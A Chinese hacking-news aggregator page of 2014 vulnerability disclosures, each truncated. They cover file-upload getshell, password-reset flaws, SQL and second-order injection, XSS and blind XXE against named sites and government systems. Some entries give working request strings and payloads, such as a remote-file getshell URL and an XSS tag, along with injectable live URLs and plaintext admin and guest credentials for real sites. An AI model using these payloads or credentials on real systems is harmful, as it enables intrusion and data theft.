记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某OA系统任意文件上传导致代码执行

通用性有人说过啦: WooYun: 某OA系统weblogic弱口令 大多数上传功能都使用一个Servlet均存在漏洞抓包修改即可绕过,而且还好贴心的返回shell路径成功上传shell 漏洞证明:该应用还自带一个编辑器jsp版的ewebedit存在默认口令admin/admin(注:需要伪造一个referer才能访问编辑器后台)如果安装后管理员没有修改密码就可以利用这个拿shell了,试了下大多数都没改袄。懒得打码了。。 修复方案:
发布时间:2014-09-02 02:35 | 阅读:220 | 评论:0 | 标签:无

海航集团旗下某网站任意用户密码修改

正常的找回密码流程,密码的重置连接在本地代码中可查看,可充值任意注册用户。http://www.chinaface.com/user/forget?step=reset&key=xxxxxx把xxxxxx替换成代码中的值即可。 漏洞证明: 修复方案:
发布时间:2014-09-02 02:35 | 阅读:174 | 评论:0 | 标签:无

DedeCMS最新版前台SQL注射

DedeCMS在注册时对用户名、电子邮箱等限制的很死,唯独对用户笔名没做限制,可填写单引号等,由此导致再次使用笔名入库时二次注入1. /member/reg_new.php 约194行$inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` , `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` ) VALUES ('$mtype',�
发布时间:2014-09-02 02:35 | 阅读:233 | 评论:0 | 标签:cms

一张图告诉你如何对抗DDoS攻击

DDoS攻击,在可以预见的未来中,还没有任何手段能够完全防御,治理和缓解才是目前最佳的应对之道,一张图带您看懂在不同环节有哪些治理和缓解方法。
发布时间:2014-09-02 01:10 | 阅读:270 | 评论:0 | 标签:网络安全 ddos

phpok4通杀前台getshell 4.0.515官方demo测试成功

/framework/www/ueditor_control.php行61remote_image_f函数没对远程文件后缀做检查直接保存到本地这个真心没什么好分析的我就不贴代码分析了 漏洞证明:构造请求/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php我这里1.txt的内容是<?php phpinfo();?>测试问题嘛 不做破坏shell地址直接返回了。这里不返回也没事,文件名可以自己算出来。http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php 修复方案:远程文件也要判断后缀
发布时间:2014-09-01 18:55 | 阅读:458 | 评论:0 | 标签:无

某政府网站大量使用的CMS直接修改管理员密码,无视密码提问,涉及众多ZF网站

本来想给“百容千域软件技术开发有限责任公司”,看厂商一直忽略,就这么公开会对大量ZF站点有较大影响,不想被查水表……就交由CNCERT转交吧!至于用户量,直接看官网ZF案例就知道了:http://www.siteserver.cn/case/54.html这里首先要这样做:随便访问一个页面,比如http://cms.demo.siteyun.cn/siteserver/login.aspx用burp代理,之后数据包就在这个上面修改1.要改密码,我们首先要有管理员的用户名,那就把上面的包改为/siteserver/userRole/background_administrator.aspx这里就是超级管理员的用户名了--------------------------------------2.然后我们获取下表单
发布时间:2014-09-01 18:55 | 阅读:309 | 评论:0 | 标签:cms

某协同网络办公OA系统若干漏洞打包(附详细分析)

官方地址:http://www.phpoa.cn版本编号:PHPOA v2.0发布时间:2014-01-27漏洞一:注入第一,分析防注入。include/common.php31行if ( !get_magic_quotes_gpc() ) {$_GET = add_slashes($_GET);$_POST = add_slashes($_POST);$_COOKIE = add_slashes($_COOKIE);}include/class_mysql.php21行if ($this->version() > '4.1') {mysql_query('SET NAMES '.strtolower(str_replace('-',�
发布时间:2014-09-01 18:55 | 阅读:324 | 评论:0 | 标签:漏洞

司法部法律援助信息管理系统通用型SQL注入一枚

版权所有:司法部 技术支持:南京擎天科技有限公司之前有大牛提交过此公司的漏洞: WooYun: 某科技有限公司开发的大部分系统通用SQL注入漏洞 关键字已经在上面了,我这完全开不了谷歌所以…… 漏洞证明:ajax/autocompleteajax.aspx?action=ValidateRepeatName&type=1&name=e下面两个都有关键字,比较好注入:http://111.11.181.59/gssfy/ajax/autocompleteajax.aspx?action=ValidateRepeatName&type=1&name=esa的啊:http://59.175.148.41/hbsfy/ajax/autocompleteajax.aspx?action=V
发布时间:2014-09-01 18:55 | 阅读:277 | 评论:0 | 标签:注入

IT168分站盲注

注入点:http://topic.it168.com/game/snapdragon1211/getdata.ashx?jsoncallback=?&articleTypeId=1测试 漏洞证明:目测数据不少web server operating system: Windows 2008web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012[11:04:52] [INFO] fetching database names[11:04:52] [INFO] fetching number of databasesavailable d
发布时间:2014-09-01 18:55 | 阅读:337 | 评论:0 | 标签:无

鲜果网RSS导入Blind XXE漏洞

http://xianguo.com/my/opml不怎么用鲜果,不过在测试其他的地方的时候发现的一个问题,Blind XXE是老漏洞,PHP的OOB也没啥难度, 不过没看到wooyun有实例,就放出来了。一般的XXE漏洞测试流程:1. 是否支持解析实体 ——> 2. 是否支持解析外部实体 1. 通常步骤是先看能否解析实体<!DOCTYPE note [<!ENTITY test "ivan_test">]>&test;2. 然后看看能否引用外部实体(当然,如果修补方案是过滤这里还需要测试通过DOCTYPE引入DTD的情况)<!DOCTYPE note [<!ENTITY test SYSTEM "http://1v4n.sina
发布时间:2014-09-01 18:55 | 阅读:316 | 评论:0 | 标签:漏洞

搜狗问问存储型XSS二

WooYun: 搜狗问问存储型XSS已打cookie 继这个帖子修复了之后今天看了一下在补充问题这边还是可以插入xss随便一个xss都可以<img src=x onerror=alert(/1/)>我测试了3个http://wenwen.sogou.com/z/q590250512.htm?ch=izw.d.wthttp://wenwen.sogou.com/z/q590251403.htm?ch=izw.d.wthttp://wenwen.sogou.com/z/q590251029.htm?ch=izw.d.wt 漏洞证明: 修复方案:过滤来个10升普通白帽子。。。
发布时间:2014-09-01 18:55 | 阅读:368 | 评论:0 | 标签:xss

观点:CloudFlare保护下的网络数据绝对不会外泄吗?

近日网络上多篇文章针对CloudFlare公司及其保护的Popvote网站安全问题提出不同观点,有的教授式告诉网友如何一步步入侵网站至个人信息泄露,有的推测式判断黑客无法成功解密。网络数据从终端到服务器,过程中泄露可能存在于终端环境是否安全可靠、数据传输线路是否被监听、数据存储是否安全这3个环节,一一分析,还是很多地方值得思考的。云防火墙防护下的网络是否绝对安全?世上本就无“绝对”的事情,网络安全更没有任何人敢说绝对安全和绝不可能泄露。近期网络上有名“Jacky Chen”的黑客进行了证明,更加让我们相信安全并非完美。此前,有个更为典型的例子即12306全国铁路订票系统,采用的是国内最大CDN公司网宿科技提供CDN服务,即便如此,12306也因CDN方面问题被爆存在个人隐私泄露问题,详情可参考W
发布时间:2014-09-01 17:30 | 阅读:483 | 评论:0 | 标签:观点

Spring框架问题分析

0x00 概述 Spring作为使用最为广泛的Java Web框架之一,拥有大量的用户。也由于用户量的庞大,Spring框架成为漏洞挖掘者关注的目标,在Struts漏洞狂出的如今,Spring也许正在被酝酿一场大的危机。 本文将针对Spring历史上曾出现的严重漏洞和问题,进行分析讨论这套框架可能存在的问题。 0x01 变量覆盖问题 CVE-2010-1622在Spring官方发布的漏洞公告中,被定义为任意代码执行漏洞。但是,这个问题的主要问题是由于,对私有成员保护不足,而导致的变量覆盖。从漏洞成因上来看并不能称为代码执行漏洞,只能算是变量覆盖,代码执行只不过是利用罢了。 Spring框架提供了一种绑定参数和对象的机制,可以把一个类绑定到一个Controller。然后在这个Contraller类中,将一个页
发布时间:2014-09-01 14:10 | 阅读:697 | 评论:0 | 标签:技术分享

宜搜某推广系统弱密码漏洞(拿到管理员权限)

首先是看到了wooyun上的关于宜搜的这个漏洞url: WooYun: 宜搜某分站SQL注射拿到系统用户库,进入后台 洞主利用注射得到密码进入了管理后台,并且附有几张图。其中一张图是后台管理账号。就是这张图泄露了后台账号。然后使用burp对后台登陆进行了暴力破解,得到了3个后台账号以及密码。登陆地址:http://ad.easou.com/admin/toLogin.admin首先登陆账号:hanweida 密码:hanweida无重要收获。登陆账号:guanggao 密码:123456得到用户重要用户数据,涉及大量RMB。最后登陆账号:pengsijing 密码:123456账号居然是管理员权限,权限非常的大。用户数量不少而且还看到加钱的地方。 漏洞证明:同上。 修复方案:1.后台登陆需要验证码进行保护。2.
发布时间:2014-09-01 11:10 | 阅读:886 | 评论:0 | 标签:漏洞

药房网手机APP漏洞第四蛋(查看、修改、添加、删除任意用户购物车内商品)

前面发了三蛋,今天发第四蛋。房网手机APP漏洞第四蛋(查看、修改、添加、删除任意用户购物车内商品),下面仅以查看、添加为例证明漏洞存在(要说明一下的是,删除用户购物车内商品时,手机端貌似只能删除手机端添加的物品,不知是否是软件设计bug?)0x01:查看任意用户的购物车,老样子直接上图看到了其他用户的购物车0x02:给任意用户购物车添加商品。首先第一次检查购物车内是否有该商品然后添加商品添加后的效果 漏洞证明:见详细说明 修复方案:在使用该APP时,貌似有不少bug,有时在wifi下打不开商品详情,有时打不开购物车,不同的手机貌似出的问题也不一样(android2.3 /4.0),希望多加测试增加服务端验证,禁止越权操作
发布时间:2014-09-01 11:10 | 阅读:518 | 评论:0 | 标签:漏洞

某省交通运输视频监控平台无需密码即可观看

http://me.hbjt.gov.cn/fb/config.js// 用户名称(用户和密码不为空时系统将自动登录,限局域网)user : 'guest',// 用户密码password : 'guest', 漏洞证明: 修复方案:你懂的。
发布时间:2014-09-01 11:10 | 阅读:700 | 评论:0 | 标签:无

华数数字电视传媒集团有限公司任意用户密码重置

漏洞存在原因:正常途径去找回密码,然后填写邮箱后点击找回密码,然后系统会给邮箱发送一封验证邮件,然后点击验证URL就可以重置密码。看起来没啥问题,下面我们看看这里是怎么处理的。1 正常途径去找回密码,然后填写邮箱后点击找回密码,抓包,返回如下内容(部分敏感内容打了点马赛克)。{"status":1,"info":"u53d1u9001u6210u529f","data":"/member/index.php/Misc/send_sucess/relier/UzNvVTY2YnZT*****DU2NDYxNUBxcS5jb20scHgxNjI0LDE5NDA5ODA="}2 然后再去看下邮箱中的验证连接。好狗血的设
发布时间:2014-09-01 11:10 | 阅读:658 | 评论:0 | 标签:无

支持多代理的攻击框架 – MultiProxies

简介MultiProxies由python编写一款开源渗透测试框架,支持多环境(windows/linux)下运行,支持http,socks4,socks5全局代理。应用场景MultiProxies的应用和代理(http/socks4/socks5)紧密联系,但是所有模块的开发过程中完全不必考虑代理的引用过程(注【1】)。在需要使用代理时只需要用相关命令设置全局代理,不需要使用时再将全局代理设为非即可。MultiProxies可以:1) 用大量的http代理,随机选择进行web扫描攻击(目录扫描,CMS识别等)。2) 用单一指定的http/socks4/socks5代理进行内网扫描攻击(端口扫描、smb、smbexec/wmiexec)等。‍‍快速运行MltPconsole.
发布时间:2014-09-01 09:45 | 阅读:748 | 评论:0 | 标签:工具 MultiProxies

公告

❤ 手机版地址:wap.hackdig.com
❤ 如果您觉得本站不错,请推荐给您的朋友!

工具

广而告知

标签云

友情链接